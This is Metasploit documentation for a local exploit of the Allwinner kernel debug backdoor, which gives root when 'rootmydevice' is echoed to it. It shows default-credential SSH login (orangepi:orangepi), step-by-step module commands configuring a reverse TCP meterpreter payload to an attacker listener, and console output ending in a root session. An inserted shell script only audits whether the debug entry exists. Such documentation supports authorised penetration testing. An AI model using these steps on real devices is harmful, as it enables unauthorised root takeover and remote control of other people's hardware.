GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/multi/local/allwinner_backdoor.md

Vulnerable Application

Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4.

Vulnerable OS:

  • all OS images available for Orange Pis

  • any for FriendlyARM's NanoPi M1

  • SinoVoip's M2+ and M3

  • Cubietech's Cubietruck +

  • Linksprite's pcDuino8 Uno

Exploitation may be possible against Dragon (x10) and Allwinner Android tablets.

This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. It implements the Allwinner privilege escalation documented in Metasploit issue #6869. The backdoor is a simple debug kernel module: when the string "rootmydevice" is echoed to it, it escalates the calling shell to root.
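A defender-side audit equivalent to the module's `check`, added here as an example and not part of the Metasploit module: it reports whether a device exposes the debug entry the backdoor listens on and whether the kernel is on the affected 3.4 branch. The path /proc/sunxi_debug/sunxi_debug and the function names are assumptions, not taken from this page.

```shell
#!/bin/sh
# Added audit helper (not from the Metasploit module). It only checks for the
# debug entry; it never writes to it.
# Assumed location of the Allwinner debug entry (assumption, not on this page):
#   /proc/sunxi_debug/sunxi_debug

# kernel_is_3_4 VERSION -> returns 0 when VERSION is on the 3.4 branch
kernel_is_3_4() {
    case "$1" in
        3.4.*) return 0 ;;
        *)     return 1 ;;
    esac
}

# backdoor_present ROOT -> returns 0 when ROOT/proc/sunxi_debug/sunxi_debug exists
# ROOT is normally "/", but a test tree can be passed for offline checks.
backdoor_present() {
    [ -e "$1/proc/sunxi_debug/sunxi_debug" ]
}

# audit_device ROOT KERNEL_VERSION -> prints a verdict
# exit 0 = debug entry exposed, exit 1 = not exposed
audit_device() {
    root="$1"
    kver="$2"
    if backdoor_present "$root"; then
        printf 'EXPOSED: sunxi debug entry present (kernel %s)\n' "$kver"
        return 0
    fi
    if kernel_is_3_4 "$kver"; then
        printf 'WARN: kernel %s is on the affected 3.4 branch, entry not found\n' "$kver"
    else
        printf 'OK: no sunxi debug entry (kernel %s)\n' "$kver"
    fi
    return 1
}

# Run on the device itself:
#   audit_device / "$(uname -r)"
```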

Verification Steps

To use this module, you need a vulnerable device.

An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.

  1. Start msfconsole

  2. Get a session

  3. Do: use exploit/multi/local/allwinner_backdoor

  4. Do: set SESSION [SESSION]

  5. Do: set LHOST [LHOST]

  6. Do: run

  7. You should get a new root session

Options

Scenarios

Orange PI running Ubuntu 14.04 (Linux 3.4.39)

  • use auxiliary/scanner/ssh/ssh_login

```
msf auxiliary(ssh_login) > set username orangepi
username => orangepi
msf auxiliary(ssh_login) > set password orangepi
password => orangepi
msf auxiliary(ssh_login) > set rhosts 192.168.2.21
rhosts => 192.168.2.21
msf auxiliary(ssh_login) > exploit

[*] 192.168.2.21:22 SSH - Starting bruteforce
[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio) Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

  • use exploit/multi/local/allwinner_backdoor

```
msf exploit(allwinner_backdoor) > set verbose true
verbose => true
msf exploit(allwinner_backdoor) > set session 1
session => 1
msf exploit(allwinner_backdoor) > set payload linux/armle/meterpreter/reverse_tcp
payload => linux/armle/meterpreter/reverse_tcp
msf exploit(allwinner_backdoor) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(allwinner_backdoor) > check
[*] The target appears to be vulnerable.
msf exploit(allwinner_backdoor) > exploit
```

Successful exploitation:

```
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (374540 bytes) to 192.168.2.248
[+] Backdoor Found, writing payload to /tmp/odzVx.elf
[*] Max line length is 65537
[*] Writing 284 bytes in 1 chunks of 843 bytes (octal-encoded), using printf
[+] Escalating
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (374540 bytes) to 192.168.2.248
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.248:49472) at 2016-09-22 21:56:50 -0400

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 192.168.2.248
OS           : Ubuntu 14.04 (Linux 3.4.39)
Architecture : armv7l
Meterpreter  : armle/linux
```